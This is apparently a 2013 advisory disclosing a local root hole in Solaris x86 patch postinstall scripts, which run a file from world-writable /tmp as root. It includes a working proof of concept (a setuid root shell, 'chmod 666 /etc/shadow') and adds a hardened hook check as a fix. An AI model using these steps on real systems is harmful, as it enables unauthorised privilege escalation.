Solaris Recommended Patch Cluster 6/19 Local Root
Source: @_larry0  Author: Cashdollar  Published: 2013-07-09
Solaris Recommended Patch Cluster 6/19 local root on x86

Larry W. Cashdollar
7/3/2013
@_larry0
If the system administrator is updating the system with Update Manager or smpatch (in multi-user mode), a local user can execute commands as root. This affects only x86 systems, because the code sits under a case statement that checks the platform is Intel based.
Local root:
Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root.
./144751-01/SUNWos86r/install/postinstall 


   782          if [ -s /tmp/diskette_rc.d/rcs9.sh ]
   783          then
   784                  /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
   785          fi

Inject entries into driver_aliases? Research the config file; maybe we can load our own library/driver?
   804  # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs)
   805  TMPFILE=/tmp/ncrstmp
   806  sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driver_aliases >$TMPFILE
   807  cp $TMPFILE ${BASEDIR}/etc/driver_aliases


./141445-09/SUNWos86r/install/postinstall


   656          if [ -s /tmp/diskette_rc.d/rcs9.sh ]
   657          then
   658                  /sbin/sh /tmp/diskette_rc.d/rcs9.sh "post"
   659          fi


Well, it looks like you've got a few chances to abuse it:


larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \;
./144501-19/SUNWos86r/install/postinstall
./141445-09/SUNWos86r/install/postinstall
./142059-01/SUNWos86r/install/postinstall
./147148-26/SUNWos86r/install/postinstall
./127128-11/SUNWos86r/install/postinstall
./148889-03/SUNWos86r/install/postinstall
./142910-17/SUNWos86r/install/postinstall
./144751-01/SUNWos86r/install/postinstall

Pseudo PoC:
Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry.
chmod 666 /etc/shadow would be easy.
PoC:
larry@slowaris:~$ cat setuid.c 
#include <stdio.h>
#include <unistd.h>
int
main (void)
{
  char *shell[2];
  shell[0] = "sh";
  shell[1] = NULL;
  setregid (0, 0);
  setreuid (0, 0);
  execve ("/bin/sh", shell, NULL);
  return(0);
}
gcc -o /tmp/r00t setuid.c
larry@slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh
chown root:root /tmp/r00t
chmod +s /tmp/r00t
After patches have been applied:
larry@slowaris:~$ /tmp/r00t
# id
uid=0(root) gid=0(root)
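As an added example, not part of the advisory or of the Solaris patches, here is a hardened stand-in for the postinstall hook quoted above: it refuses to run the script unless its directory and the file itself are owned by the invoking user, are not symlinks and are not group- or world-writable. Function names are assumed; the proper fix is for a patch never to execute anything from a world-writable directory, so this check is defense in depth rather than a substitute for that.

```shell
#!/bin/sh
# Added example, not part of the advisory: hardened stand-in for the
# postinstall hook that ran /tmp/diskette_rc.d/rcs9.sh as root whenever the
# file was non-empty.  Function names are assumed.

hook_is_trusted() {
    # $1: hook script path.  Returns 0 only if the containing directory and
    # the file are owned by the invoking user, are not symlinks and are not
    # group- or world-writable.
    hook=$1
    dir=$(dirname "$hook")
    me=$(id -u)
    for p in "$dir" "$hook"; do
        if [ -L "$p" ]; then
            echo "refusing $p: symbolic link" >&2; return 1
        fi
        if [ ! -e "$p" ]; then
            echo "refusing $p: missing" >&2; return 1
        fi
        # ls -ldn prints "mode links uid gid ..." with a numeric owner and is
        # available on both Solaris and GNU systems, unlike stat(1).
        set -- $(ls -ldn "$p")
        mode=$1; owner=$3
        if [ "$owner" != "$me" ]; then
            echo "refusing $p: owned by uid $owner, not $me" >&2; return 1
        fi
        # 6th character of the mode is the group write bit, 9th the world one.
        case $mode in
            ?????w*|????????w*)
                echo "refusing $p: group/world writable ($mode)" >&2; return 1 ;;
        esac
    done
    [ -d "$dir" ] && [ -f "$hook" ] && [ -s "$hook" ]
}

run_hook() {
    # Same shape as the original "if [ -s ... ]; then /sbin/sh ... post; fi",
    # but gated by hook_is_trusted.  Uses sh instead of Solaris' /sbin/sh.
    hook=${1:-/tmp/diskette_rc.d/rcs9.sh}
    if hook_is_trusted "$hook"; then
        sh "$hook" "post"
    else
        echo "skipping $hook" >&2
        return 1
    fi
}
```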